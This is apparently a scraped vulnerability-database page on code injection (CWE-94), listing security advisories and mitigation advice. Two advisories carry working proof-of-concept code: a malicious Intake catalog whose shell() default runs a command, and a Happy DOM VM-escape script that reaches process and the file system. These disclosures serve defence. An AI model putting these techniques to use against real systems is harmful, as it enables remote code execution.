CWE-94
Allowed-with-ReviewImproper Control of Generation of Code ('Code Injection')
Abstraction: Base · Status: Draft
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
8319 vulnerabilities reference this CWE, most recent first.
GHSA-373W-8GF3-3HVX
Vulnerability from github – Published: 2022-05-02 03:16 – Updated: 2022-05-02 03:16Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability."
{
"affected": [],
"aliases": [
"CVE-2009-0555"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2009-10-14T10:30:00Z",
"severity": "HIGH"
},
"details": "Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka \"Windows Media Runtime Voice Sample Rate Vulnerability.\"",
"id": "GHSA-373w-8gf3-3hvx",
"modified": "2022-05-02T03:16:36Z",
"published": "2022-05-02T03:16:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2009-0555"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-051"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6407"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA09-286A.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-374C-2PVV-FXF5
Vulnerability from github – Published: 2025-12-10 21:31 – Updated: 2025-12-17 21:30A template injection vulnerability in the /vip/v1/file/save component of ChanCMS v3.3.4 allows attackers to execute arbitrary code via a crafted POST request.
{
"affected": [],
"aliases": [
"CVE-2025-65602"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-10T20:16:21Z",
"severity": "CRITICAL"
},
"details": "A template injection vulnerability in the /vip/v1/file/save component of ChanCMS v3.3.4 allows attackers to execute arbitrary code via a crafted POST request.",
"id": "GHSA-374c-2pvv-fxf5",
"modified": "2025-12-17T21:30:41Z",
"published": "2025-12-10T21:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65602"
},
{
"type": "WEB",
"url": "https://gitee.com/chancms/ChanCMS"
},
{
"type": "WEB",
"url": "https://www.notion.so/ChanCMS-Unauthenticated-RCE-2a3ee9235ba380fc9973e16c06258689"
},
{
"type": "WEB",
"url": "https://www.notion.so/ChanCMS-Unauthenticated-RCE-2a3ee9235ba380fc9973e16c06258689?source=copy_link"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-374C-5PJ4-7V9C
Vulnerability from github – Published: 2022-05-04 00:28 – Updated: 2022-05-04 00:28Microsoft Internet Explorer 6 through 9 allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document that is not properly handled during a "Print table of links" print operation, aka "Print Feature Remote Code Execution Vulnerability."
{
"affected": [],
"aliases": [
"CVE-2012-0168"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2012-04-10T21:55:00Z",
"severity": "HIGH"
},
"details": "Microsoft Internet Explorer 6 through 9 allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document that is not properly handled during a \"Print table of links\" print operation, aka \"Print Feature Remote Code Execution Vulnerability.\"",
"id": "GHSA-374c-5pj4-7v9c",
"modified": "2022-05-04T00:28:30Z",
"published": "2022-05-04T00:28:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0168"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-023"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74379"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15577"
},
{
"type": "WEB",
"url": "http://osvdb.org/81126"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id?1026901"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-377G-GWP8-J5FX
Vulnerability from github – Published: 2026-05-10 15:31 – Updated: 2026-05-10 15:31Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server.
{
"affected": [],
"aliases": [
"CVE-2022-50944"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-10T13:16:32Z",
"severity": "HIGH"
},
"details": "Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server.",
"id": "GHSA-377g-gwp8-j5fx",
"modified": "2026-05-10T15:31:20Z",
"published": "2026-05-10T15:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-50944"
},
{
"type": "WEB",
"url": "https://github.com/MegaTKC/AeroCMS"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/51085"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/aero-cms-php-code-injection-via-posts-php"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-37G4-QQQV-7M99
Vulnerability from github – Published: 2026-03-19 17:46 – Updated: 2026-03-25 20:52Summary
The shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process. If a catalog contains a parameter default such as shell(), the command may be executed when the catalog source is accessed. This means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system. This behavior could potentially be classified as OS Command Injection / Unsafe Shell Expansion.
Details
The issue appears to originate from how parameter default values are expanded when a catalog source is accessed.
During catalog loading and source access:
Intake resolves parameter default values The function responsible for expanding defaults processes the shell() syntax The shell expression triggers a subprocess execution Because this occurs during catalog evaluation, the command may execute before the user explicitly interacts with the dataset itself.
Affected logic appears to involve:
expand_defaults()
and related parameter parsing mechanisms.
PoC
exploit.yaml
metadata:
version: 1
sources:
rce_test:
driver: csv
description: "Testing shell expansion in parameters"
args:
urlpath: "{{ cmd_exec }}"
parameters:
cmd_exec:
display_name: "Test Parameter"
type: str
default: "shell(touch /tmp/intake_rce_test)"
reproduce.py
import intake
import os
PROOF_FILE = "/tmp/intake_rce_test"
if os.path.exists(PROOF_FILE):
os.remove(PROOF_FILE)
print(f"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}")
try:
cat = intake.open_catalog("exploit.yaml")
print("Accessing source...")
_ = cat["rce_test"]
except Exception as e:
print(f" Error during execution: {e}")
if os.path.exists(PROOF_FILE):
print(f" Command execution confirmed, Found: {PROOF_FILE}")
else:
print("Command execution did not occur.")
Attack Scenario
A potential attack scenario could be:
- An attacker publishes a malicious Intake catalog YAML file
- The victim downloads or loads the catalog
- The victim accesses a source entry in the catalog
- Parameter defaults are expanded
- The shell() expression triggers execution of the embedded command
Impact
If this behavior is confirmed to be unintended, an attacker could distribute a malicious catalog file via:
- Git repositories
- shared datasets
- URLs
- data science workflows
- Any user loading the catalog could unknowingly execute commands with their local user privileges.
Recommendation
Possible mitigations could include:
- disabling shell() expansion by default
- requiring an explicit opt-in flag (e.g., allow_shell=True)
- restricting shell execution for catalogs loaded from untrusted sources Please let me know if additional information or testing is needed. I'm happy to assist with further analysis or validation.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "intake"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.0.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33310"
],
"database_specific": {
"cwe_ids": [
"CWE-78",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-19T17:46:54Z",
"nvd_published_at": "2026-03-24T14:16:30Z",
"severity": "HIGH"
},
"details": "### Summary\nThe shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process.\nIf a catalog contains a parameter default such as shell(\u003ccommand\u003e), the command may be executed when the catalog source is accessed.\nThis means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system.\nThis behavior could potentially be classified as OS Command Injection / Unsafe Shell Expansion.\n\n### Details\nThe issue appears to originate from how parameter default values are expanded when a catalog source is accessed.\n\nDuring catalog loading and source access:\n\nIntake resolves parameter default values\nThe function responsible for expanding defaults processes the shell() syntax\nThe shell expression triggers a subprocess execution\nBecause this occurs during catalog evaluation, the command may execute before the user explicitly interacts with the dataset itself.\n\nAffected logic appears to involve:\n```\nexpand_defaults()\n```\nand related parameter parsing mechanisms.\n\n\n### PoC\nexploit.yaml\n```\nmetadata:\n version: 1\nsources:\n rce_test:\n driver: csv\n description: \"Testing shell expansion in parameters\"\n args:\n urlpath: \"{{ cmd_exec }}\"\n parameters:\n cmd_exec:\n display_name: \"Test Parameter\"\n type: str\n default: \"shell(touch /tmp/intake_rce_test)\"\n```\n\nreproduce.py\n```\nimport intake\nimport os\n\nPROOF_FILE = \"/tmp/intake_rce_test\"\n\nif os.path.exists(PROOF_FILE):\n os.remove(PROOF_FILE)\n\nprint(f\"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}\")\n\ntry:\n cat = intake.open_catalog(\"exploit.yaml\")\n\n print(\"Accessing source...\")\n _ = cat[\"rce_test\"]\n\nexcept Exception as e:\n print(f\" Error during execution: {e}\")\n\nif os.path.exists(PROOF_FILE):\n print(f\" Command execution confirmed, Found: {PROOF_FILE}\")\nelse:\n print(\"Command execution did not occur.\")\n```\n### Attack Scenario\nA potential attack scenario could be:\n\n1. An attacker publishes a malicious Intake catalog YAML file\n2. The victim downloads or loads the catalog\n3. The victim accesses a source entry in the catalog\n4. Parameter defaults are expanded\n5. The shell() expression triggers execution of the embedded command\n\n### Impact\n\nIf this behavior is confirmed to be unintended, an attacker could distribute a malicious catalog file via:\n\n- Git repositories\n- shared datasets\n- URLs\n- data science workflows\n- Any user loading the catalog could unknowingly execute commands with their local user privileges.\n\n### Recommendation\nPossible mitigations could include:\n\n- disabling shell() expansion by default\n- requiring an explicit opt-in flag (e.g., allow_shell=True)\n- restricting shell execution for catalogs loaded from untrusted sources\nPlease let me know if additional information or testing is needed.\nI\u0027m happy to assist with further analysis or validation.",
"id": "GHSA-37g4-qqqv-7m99",
"modified": "2026-03-25T20:52:29Z",
"published": "2026-03-19T17:46:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/intake/intake/security/advisories/GHSA-37g4-qqqv-7m99"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33310"
},
{
"type": "WEB",
"url": "https://github.com/intake/intake/commit/d0c0b6b57c1cb3f73880655ded4a9b0e18e1fd1b"
},
{
"type": "PACKAGE",
"url": "https://github.com/intake/intake"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Intake has a Command Injection via shell() Expansion in Parameter Defaults"
}
GHSA-37J7-FG3J-429F
Vulnerability from github – Published: 2025-10-10 23:46 – Updated: 2025-10-13 15:48Escape of VM Context gives access to process level functionality
Summary
Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks.
A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality.
It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the require() function to import modules.
Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment.
Reproduce
CommonJS (Possible to get hold of require)
const { Window } = require('happy-dom');
const window = new Window({ console });
window.document.write(`
<script>
const process = this.constructor.constructor('return process')();
const require = process.mainModule.require;
console.log('Files:', require('fs').readdirSync('.').slice(0,3));
</script>
`);
ESM (Not possible to get hold of import or require)
const { Window } = require('happy-dom');
const window = new Window({ console });
window.document.write(`
<script>
const process = this.constructor.constructor('return process')();
console.log('PID:', process.pid);
</script>
`);
Potential Impact
Server-Side Rendering (SSR)
const { Window } = require('happy-dom');
const window = new Window();
window.document.innerHTML = userControlledHTML;
Testing Frameworks
Any test suite using Happy-DOM with untrusted content may be at risk
Attack Scenarios
- Data Exfiltration: Access to environment variables, configuration files, secrets
- Lateral Movement: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.).
- Code Execution: Child process access for running arbitrary commands
- Persistence: File system access
Recommended Immediate Actions
- Update Happy DOM to v20 or above
- This version has JavaScript evaluation disabled by default
- This version will output a warning if JavaScript is enabled in an insecure environment
- Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled
- This makes sure that evaluation can't be used at process level to escape the VM
eval()andFunction()can still be used within the Happy DOM VM without any known security risk- Happy DOM v20 and above will output a warning if this flag is not in use
- If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment
Technical Root Cause
All classes and functions inherit from Function. By walking the constructor chain it's possible to get hold of Function at process level. As Function can evaluate code from strings, it's possible to execute code at process level.
Running Node with the "--disallow-code-generation-from-strings" flag protects against this.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "happy-dom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "20.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-61927"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-10T23:46:42Z",
"nvd_published_at": "2025-10-10T20:15:38Z",
"severity": "CRITICAL"
},
"details": "# Escape of VM Context gives access to process level functionality\n\n## Summary\nHappy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks.\n\nA Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality.\n\nIt seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules.\n\nHappy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment.\n\n## Reproduce\n\n### CommonJS (Possible to get hold of require)\n\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window({ console });\n\nwindow.document.write(`\n \u003cscript\u003e\n const process = this.constructor.constructor(\u0027return process\u0027)();\n const require = process.mainModule.require;\n \n console.log(\u0027Files:\u0027, require(\u0027fs\u0027).readdirSync(\u0027.\u0027).slice(0,3));\n \u003c/script\u003e\n`);\n```\n### ESM (Not possible to get hold of import or require)\n\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window({ console });\n\nwindow.document.write(`\n \u003cscript\u003e\n const process = this.constructor.constructor(\u0027return process\u0027)();\n \n console.log(\u0027PID:\u0027, process.pid);\n \u003c/script\u003e\n`);\n```\n\n## Potential Impact\n\n#### Server-Side Rendering (SSR)\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window();\nwindow.document.innerHTML = userControlledHTML;\n```\n\n#### Testing Frameworks\nAny test suite using Happy-DOM with untrusted content may be at risk\n\n## Attack Scenarios\n\n1. **Data Exfiltration**: Access to environment variables, configuration files, secrets\n2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.).\n3. **Code Execution**: Child process access for running arbitrary commands\n4. **Persistence**: File system access\n\n## Recommended Immediate Actions\n\n1. Update Happy DOM to v20 or above\n - This version has JavaScript evaluation disabled by default\n - This version will output a warning if JavaScript is enabled in an insecure environment\n2. Run Node.js with the \"--disallow-code-generation-from-strings\" if you need JavaScript evaluation enabled\n - This makes sure that evaluation can\u0027t be used at process level to escape the VM\n - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk\n - Happy DOM v20 and above will output a warning if this flag is not in use\n4. If you can\u0027t update Happy DOM right now, it\u0027s recommended to disable JavaScript evaluation, unless you completely trust the content within the environment\n\n## Technical Root Cause\n\nAll classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it\u0027s possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it\u0027s possible to execute code at process level.\n\nRunning Node with the \"--disallow-code-generation-from-strings\" flag protects against this.",
"id": "GHSA-37j7-fg3j-429f",
"modified": "2025-10-13T15:48:53Z",
"published": "2025-10-10T23:46:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61927"
},
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405"
},
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/commit/de438ad72921c69793584aa657b48d3655dfac97"
},
{
"type": "PACKAGE",
"url": "https://github.com/capricorn86/happy-dom"
},
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/releases/tag/v20.0.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
"type": "CVSS_V4"
}
],
"summary": "Happy DOM: VM Context Escape can lead to Remote Code Execution"
}
GHSA-37M3-29M6-VGXQ
Vulnerability from github – Published: 2022-05-01 07:40 – Updated: 2022-05-01 07:40PHP remote file inclusion vulnerability in inertianews_main.php in inertianews 0.02 beta allows remote attackers to execute arbitrary PHP code via a URL in the inews_path parameter.
{
"affected": [],
"aliases": [
"CVE-2006-6726"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2006-12-26T21:28:00Z",
"severity": "HIGH"
},
"details": "PHP remote file inclusion vulnerability in inertianews_main.php in inertianews 0.02 beta allows remote attackers to execute arbitrary PHP code via a URL in the inews_path parameter.",
"id": "GHSA-37m3-29m6-vgxq",
"modified": "2022-05-01T07:40:48Z",
"published": "2022-05-01T07:40:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-6726"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/2976"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/21713"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2006/5130"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-37PQ-893F-G7Q5
Vulnerability from github – Published: 2025-04-27 21:34 – Updated: 2025-11-05 22:01A vulnerability was found in Apereo CAS 5.2.6 and classified as critical. Affected by this issue is the function saveService of the file cas-5.2.6\webapp-mgmt\cas-management-webapp-support\src\main\java\org\apereo\cas\mgmt\services\web\RegisteredServiceSimpleFormController.java of the component Groovy Code Handler. The manipulation leads to code injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apereo.cas:cas-management-webapp-support"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "5.2.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-3984"
],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-28T20:39:01Z",
"nvd_published_at": "2025-04-27T20:15:15Z",
"severity": "LOW"
},
"details": "A vulnerability was found in Apereo CAS 5.2.6 and classified as critical. Affected by this issue is the function saveService of the file cas-5.2.6\\webapp-mgmt\\cas-management-webapp-support\\src\\main\\java\\org\\apereo\\cas\\mgmt\\services\\web\\RegisteredServiceSimpleFormController.java of the component Groovy Code Handler. The manipulation leads to code injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-37pq-893f-g7q5",
"modified": "2025-11-05T22:01:03Z",
"published": "2025-04-27T21:34:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3984"
},
{
"type": "PACKAGE",
"url": "https://github.com/apereo/cas"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.306320"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.306320"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.557100"
},
{
"type": "WEB",
"url": "https://wx.mail.qq.com/s?k=ilW4ixcMaVgGU49Dij"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Apereo CAS code injection vulnerability"
}
GHSA-37Q2-9VP4-Q6F4
Vulnerability from github – Published: 2022-05-17 04:30 – Updated: 2022-05-17 04:30Untrusted search path vulnerability in Ghostscript 8.62 allows local users to execute arbitrary PostScript code via a Trojan horse Postscript library file in Encoding/ under the current working directory, a different vulnerability than CVE-2010-2055.
{
"affected": [],
"aliases": [
"CVE-2010-4820"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2014-10-27T01:55:00Z",
"severity": "MODERATE"
},
"details": "Untrusted search path vulnerability in Ghostscript 8.62 allows local users to execute arbitrary PostScript code via a Trojan horse Postscript library file in Encoding/ under the current working directory, a different vulnerability than CVE-2010-2055.",
"id": "GHSA-37q2-9vp4-q6f4",
"modified": "2022-05-17T04:30:18Z",
"published": "2022-05-17T04:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4820"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=599564"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=771853"
},
{
"type": "WEB",
"url": "http://bugs.ghostscript.com/show_bug.cgi?id=691339"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2012-0095.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2012-0096.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2012/01/04/7"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/511433"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/51847"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-37RP-RG27-25P2
Vulnerability from github – Published: 2022-05-17 01:22 – Updated: 2022-05-17 01:22"Dokodemo eye Smart HD" SCR02HD Firmware 1.0.3.1000 and earlier allows authenticated attackers to conduct code injection attacks via unspecified vectors.
{
"affected": [],
"aliases": [
"CVE-2017-10835"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-08-29T01:35:00Z",
"severity": "HIGH"
},
"details": "\"Dokodemo eye Smart HD\" SCR02HD Firmware 1.0.3.1000 and earlier allows authenticated attackers to conduct code injection attacks via unspecified vectors.",
"id": "GHSA-37rp-rg27-25p2",
"modified": "2022-05-17T01:22:09Z",
"published": "2022-05-17T01:22:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-10835"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN87410770/index.html"
},
{
"type": "WEB",
"url": "http://www.nippon-antenna.co.jp/product/ine/pdf/scr02hd_about_security.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Strategy: Refactoring
Refactor your program so that you do not have to dynamically generate code.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-242: Code Injection
An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.